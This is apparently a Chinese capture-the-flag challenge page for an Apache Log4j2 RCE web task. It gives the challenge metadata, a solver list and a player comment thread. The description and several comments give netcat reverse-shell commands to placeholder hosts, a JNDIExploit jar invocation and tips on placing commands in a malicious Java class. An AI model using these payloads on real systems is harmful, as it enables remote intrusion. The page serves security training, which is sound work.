Apache Log4j2 RCEWEB 未解决
分数:
25
金币:
3
题目作者:
云牧青
一 血:
yeedo
一血奖励:
8金币
解 决:
509
提 示:
人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描 述:
/bin/bash:x ;
/bin/sh √ ;
/dev/tcp × ;
nc -e x ;
nc a.cc 1234 -e √ ;
评分(6)
解题动态
tingsi464 攻破了该题 7天前
minshenyao 攻破了该题 1月前
tfios 攻破了该题 1月前
yanzhenfeng 攻破了该题 2月前
rookiee 攻破了该题 2月前
有手就行 攻破了该题 3月前
栩xu 攻破了该题 3月前
Waxberry 攻破了该题 3月前
15164739795 攻破了该题 4月前
baozongwi 攻破了该题 4月前
Tsukisec 攻破了该题 4月前
bugbiubiubiu 攻破了该题 4月前
coldplay99999 攻破了该题 4月前
2663645309 攻破了该题 5月前
blacklotus0 攻破了该题 5月前
起名好难 攻破了该题 5月前
vnuesa 攻破了该题 5月前
ailx10 攻破了该题 5月前
tsuppari 攻破了该题 6月前
评论
luckying 3年前
举报
flag文件夹里没东西啊
harry 管理员 3年前
举报
根目录
yyjuntion 3年前
举报
一直反弹不回来。。
endual 3年前
举报
反弹不行的,估计主机有限制
菜咩一只 3年前
举报
http://114.67.175.224:10273/
zoolip 3年前
举报
不能再外网搭建服务器,怎么复现呢?
cookie 3年前
举报
阿里云有免费试用的vps
blueyst 3年前
举报
可以找别人借一下
yyjuntion 3年前
举报
恶意的类怎么上传呢。。
小白笑 3年前
举报
有没有wp
ZianTT 3年前
举报
peach
haoge 3年前
举报
nb,这就上了??
VVeaker 3年前
举报
服务器直接裂开
xiaohui 3年前
举报
搞了一天半都还没复现
bob1994 3年前
举报
nc -e /bin/sh X.X.X.X 12345 弹不回shell??
dididizi 3年前
举报
@wufeng java -jar JNDIExploit-1.2-SNAPSHOT.jar -i IP --illegal-access=warn_________这个意思?
云牧青 3年前
举报
@bob1994 nc X.X.X.X 1234 -e /bin/sh,类没问题吧,执行命令放在构造函数或者静态代码块里,还要处理异常
bob1994 3年前
举报
@云牧青 能收到ldap请求和http请求.class文件,但就是弹不回shell
美式加糖 3年前
举报
shell弹不出来啊,成功的老哥能把恶意类分享一下吗?我看看我的有没有出错
xiangxw 3年前
举报
@云牧青 这样。谢谢
云牧青 3年前
举报
@xiangxw docker镜像是alpine,它的nc就是这样,只能放后面,不然报错...
JNsnow 3年前
举报
@wufeng 加一,刚复现,也是这个问题
wufeng 3年前
举报
我这边也是,ping命令都行,反弹就不行,卡了一天。。。现在似乎找到问题了,好像是我vps上的java版本问题,java命令后面跟上--illegal-access=warn就好了,不行的老哥可以试试。
xiangxw 3年前
举报
@云牧青 为什么要放后面
云牧青 3年前
举报
@bob1994 nc没毛病,-e在后面可以的。排查一下,首先确定你有没有收到rmi/ldap请求,再确定有没有收到http请求.class文件。实在不行下载源码本地搭建看看
bob1994 3年前
举报
@harry nc X.X.X.X 12345 -e /bin/sh 好像还是不行
18634648362 3年前
举报
@harry 我也试了好多反弹shell命令 弹不回来
harry 管理员 3年前
举报
-e放后面试试
ZianTT 3年前
举报
同问?